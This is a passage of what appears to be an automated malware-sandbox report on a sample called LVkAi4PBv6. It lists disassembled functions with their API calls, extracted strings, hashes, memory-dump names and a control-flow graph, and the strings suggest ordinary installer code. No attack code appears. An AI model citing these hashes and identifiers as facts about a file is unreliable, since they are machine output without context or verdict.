                                                                                                                                                                                                                                                                                                  • API String ID: 464720113-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 49b676b1dfb9f133315c2ea33fcc1433dc7128f57f78483b087ebd39c9e55201
                                                                                                                                                                                                                                                                                                  • Instruction ID: 350ed1928072f9a075a1c2e6fd4b45dff358af22ef353d88aeeaaf43202f1ab4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49b676b1dfb9f133315c2ea33fcc1433dc7128f57f78483b087ebd39c9e55201
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F0A47694013AABAB108F89890595AFBACFF45720B01411AFD44E7700E7B0BD1087D4
                                                                                                                                                                                                                                                                                                  Function 008A3D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36comCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00865466,?,00000000,00865466,?,?,?), ref: 008A3DA7
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00000001,008C716C,?), ref: 008A3DBF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Microsoft.Update.AutoUpdate, xrefs: 008A3DA2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                                                                                                                                                                                  • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                                                                                                                                                  • API String ID: 2151042543-675569418
                                                                                                                                                                                                                                                                                                  • Opcode ID: 875729b5e0cd6a03bfd882f7eddcd30a75965e2a0ccf2b38c4ec4f6eaaabc5a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e973dcbaf77d15f1ab71c9f052542af2e6e670cb7021e63a2d4a1458e1831aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 875729b5e0cd6a03bfd882f7eddcd30a75965e2a0ccf2b38c4ec4f6eaaabc5a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F05E71600608BBEB00EFA8DD05EEFB7BCFB09710F40046AFA01E7251D671AE0487A2
                                                                                                                                                                                                                                                                                                  Function 008A31EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3200
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A3230
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cae49c736401e7eea8da83bf53dfbd54c3ac2201fd6d63a35407832d299482a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 71838db55be9faf03a30c5f5ba9c464b43ddb2e70bacb502e19a3e4599a193b1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cae49c736401e7eea8da83bf53dfbd54c3ac2201fd6d63a35407832d299482a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0BE31101658E7E7310F849C08FABB7A8FB82B62F254029FC04EB710C7758E1096E0
                                                                                                                                                                                                                                                                                                  Function 008A3498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A34AD
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A34DD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 344208780-1270936966
                                                                                                                                                                                                                                                                                                  • Opcode ID: 134d494781db2d742ee62b4ce85aff87de5a25a93253a5c05cdef96c863bc88a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c14842681d91a9b94049b3a1741ab97c8a2c9d5253d6cbb85f9a41b69155baa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 134d494781db2d742ee62b4ce85aff87de5a25a93253a5c05cdef96c863bc88a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24F0B431242218A7DB331F449C08E9B7BA8FB56B61F25412AFC04D7710D775DE5096E4
                                                                                                                                                                                                                                                                                                  Function 008A0E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008A0E28
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-850864035
                                                                                                                                                                                                                                                                                                  • Opcode ID: fbe49a0d0b9fff8b15a7693a8daab2f9e824aed87a6e943d9705cccf4a77b133
                                                                                                                                                                                                                                                                                                  • Instruction ID: 33aa6d92be550bf67769c10e17bf28947b34ddd6909aeb7be923447dbc119e08
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe49a0d0b9fff8b15a7693a8daab2f9e824aed87a6e943d9705cccf4a77b133
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BE0ECB0541A619AD7115B14FC07F427EB0F731759F014139F415DB671E3B68864DF90

                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                  Function 005C1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005C10DD,?,00000000), ref: 005C33E8
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 005C10F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1186
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1191
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005C119F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005C11C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C1175: GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,0060B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 005C1131
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                                                                                                                                                  • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3687706282-3151496603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b761f8c5193bf4270548f8bf4706ab3be129add317724ad41ab836cca123ad9
                                                                                                                                                                                                                                                                                                  • Instruction ID: e447e32de371c2b182b6bedac1971d522be9ac7c68a61c29229057b8ca39be6e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b761f8c5193bf4270548f8bf4706ab3be129add317724ad41ab836cca123ad9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76216B7194021DAFCB109FE4DC09FEFBFBABB49710F549119EA11B6282D7B45A04CBA4
                                                                                                                                                                                                                                                                                                  Function 005FFEC6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFEF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFF04
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 005FFF0D
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(8007139F,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 005FFF23
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0062B5FC,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0060001A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                                                  • String ID: $eb$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(eb$,eb$0eb
                                                                                                                                                                                                                                                                                                  • API String ID: 296830338-3922426939
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c57b8dc4013269eda4ccc651a753852fc6067a350b00afca0a3fa78ed5af88b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d3cd5f3de24d91ee34bb5a646a1bf3d6bc538da41092938b3a7e3510a0ef93b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c57b8dc4013269eda4ccc651a753852fc6067a350b00afca0a3fa78ed5af88b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A419D32D40619ABDF258FA4DC44BBFBBBAFF08B11F045465FA01A6290D7388D41CBA0
                                                                                                                                                                                                                                                                                                  Function 005DA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder., xrefs: 005DA116
                                                                                                                                                                                                                                                                                                  • Failed create working folder., xrefs: 005DA0EE
                                                                                                                                                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 005DA0D8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                                                                                                                                                  • API String ID: 3841436932-2072961686
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a1166f6fcef0b8e05b9b906c29b3ff06e0728ee35e9387c1456708bdd6c7872
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b52a82d3aadcd678df7eeee494bafd7d7ec20c4bc2f33f765c6321907439f64
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a1166f6fcef0b8e05b9b906c29b3ff06e0728ee35e9387c1456708bdd6c7872
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1018432945529FA8B325A99DC0AC9FBE7AFF94B20B154257F8007A310EB359F40E691
                                                                                                                                                                                                                                                                                                  Function 005CF9E3 Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 0 5cf9e3-5cfa14 call 6039af 3 5cfa18-5cfa1a 0->3 4 5cfa16 0->4 5 5cfa1c-5cfa29 call 600237 3->5 6 5cfa2e-5cfa47 call 6032f3 3->6 4->3 11 5cff16-5cff1b 5->11 12 5cfa49-5cfa4e 6->12 13 5cfa53-5cfa68 call 6032f3 6->13 14 5cff1d-5cff1f 11->14 15 5cff23-5cff28 11->15 16 5cff0d-5cff14 call 600237 12->16 25 5cfa6a-5cfa6f 13->25 26 5cfa74-5cfa81 call 5cea42 13->26 14->15 18 5cff2a-5cff2c 15->18 19 5cff30-5cff35 15->19 27 5cff15 16->27 18->19 23 5cff3d-5cff41 19->23 24 5cff37-5cff39 19->24 28 5cff4b-5cff52 23->28 29 5cff43-5cff46 call 605636 23->29 24->23 25->16 33 5cfa8d-5cfaa2 call 6032f3 26->33 34 5cfa83-5cfa88 26->34 27->11 29->28 37 5cfaae-5cfac0 call 604c97 33->37 38 5cfaa4-5cfaa9 33->38 34->16 41 5cfacf-5cfae4 call 6032f3 37->41 42 5cfac2-5cfaca 37->42 38->16 48 5cfae6-5cfaeb 41->48 49 5cfaf0-5cfb05 call 6032f3 41->49 43 5cfd99-5cfda2 call 600237 42->43 43->27 48->16 52 5cfb07-5cfb0c 49->52 53 5cfb11-5cfb23 call 603505 49->53 52->16 56 5cfb2f-5cfb45 call 6039af 53->56 57 5cfb25-5cfb2a 53->57 60 5cfb4b-5cfb4d 56->60 61 5cfdf4-5cfe0e call 5cecbe 56->61 57->16 62 5cfb4f-5cfb54 60->62 63 5cfb59-5cfb6e call 603505 60->63 68 5cfe1a-5cfe32 call 6039af 61->68 69 5cfe10-5cfe15 61->69 62->16 71 5cfb7a-5cfb8f call 6032f3 63->71 72 5cfb70-5cfb75 63->72 76 5cfefc-5cfefd call 5cf0f8 68->76 77 5cfe38-5cfe3a 68->77 69->16 78 5cfb9f-5cfbb4 call 6032f3 71->78 79 5cfb91-5cfb93 71->79 72->16 86 5cff02-5cff06 76->86 80 5cfe3c-5cfe41 77->80 81 5cfe46-5cfe64 call 6032f3 77->81 90 5cfbc4-5cfbd9 call 6032f3 78->90 91 5cfbb6-5cfbb8 78->91 79->78 83 5cfb95-5cfb9a 79->83 80->16 92 5cfe66-5cfe6b 81->92 93 5cfe70-5cfe88 call 6032f3 81->93 83->16 86->27 89 5cff08 86->89 89->16 101 5cfbe9-5cfbfe call 6032f3 90->101 102 5cfbdb-5cfbdd 90->102 91->90 94 5cfbba-5cfbbf 91->94 92->16 99 5cfe8a-5cfe8c 93->99 100 5cfe95-5cfead call 6032f3 93->100 94->16 99->100 103 5cfe8e-5cfe93 99->103 109 5cfeaf-5cfeb1 100->109 110 5cfeba-5cfed2 call 6032f3 100->110 111 5cfc0e-5cfc23 call 6032f3 101->111 112 5cfc00-5cfc02 101->112 102->101 104 5cfbdf-5cfbe4 102->104 103->16 104->16 109->110 113 5cfeb3-5cfeb8 109->113 119 5cfedb-5cfef3 call 6032f3 110->119 120 5cfed4-5cfed9 110->120 121 5cfc25-5cfc27 111->121 122 5cfc33-5cfc48 call 6032f3 111->122 112->111 114 5cfc04-5cfc09 112->114 113->16 114->16 119->76 128 5cfef5-5cfefa 119->128 120->16 121->122 124 5cfc29-5cfc2e 121->124 129 5cfc58-5cfc6d call 6032f3 122->129 130 5cfc4a-5cfc4c 122->130 124->16 128->16 134 5cfc7d-5cfc92 call 6032f3 129->134 135 5cfc6f-5cfc71 129->135 130->129 131 5cfc4e-5cfc53 130->131 131->16 139 5cfc94-5cfc96 134->139 140 5cfca2-5cfcba call 6032f3 134->140 135->134 136 5cfc73-5cfc78 135->136 136->16 139->140 141 5cfc98-5cfc9d 139->141 144 5cfcbc-5cfcbe 140->144 145 5cfcca-5cfce2 call 6032f3 140->145 141->16 144->145 146 5cfcc0-5cfcc5 144->146 149 5cfce4-5cfce6 145->149 150 5cfcf2-5cfd07 call 6032f3 145->150 146->16 149->150 151 5cfce8-5cfced 149->151 154 5cfd0d-5cfd2a CompareStringW 150->154 155 5cfda7-5cfda9 150->155 151->16 158 5cfd2c-5cfd32 154->158 159 5cfd34-5cfd49 CompareStringW 154->159 156 5cfdab-5cfdb2 155->156 157 5cfdb4-5cfdb6 155->157 156->157 160 5cfdb8-5cfdbd 157->160 161 5cfdc2-5cfdda call 603505 157->161 162 5cfd75-5cfd7a 158->162 163 5cfd4b-5cfd55 159->163 164 5cfd57-5cfd6c CompareStringW 159->164 160->16 161->61 170 5cfddc-5cfdde 161->170 162->157 163->162 166 5cfd7c-5cfd94 call 5c3821 164->166 167 5cfd6e 164->167 166->43 167->162 172 5cfdea 170->172 173 5cfde0-5cfde5 170->173 172->61 173->16
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ET\$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1325008406
                                                                                                                                                                                                                                                                                                  • Opcode ID: a21efa6dd22913ac872a2c0b0a0fa180e1e328659fffbd7873fd9446cb3ba3f0
                                                                                                                                                                                                                                                                                                  • Instruction ID: da115ce1aef979508f3eb3a230ed53596a6c966c61539ffa09ff09fd7b23474f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a21efa6dd22913ac872a2c0b0a0fa180e1e328659fffbd7873fd9446cb3ba3f0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E19736E84675BECB1196E0CC42FEEBAA7BB05710F16023DFA11FA291D7615E8097D0
                                                                                                                                                                                                                                                                                                  Function 005CB48B Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 578fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
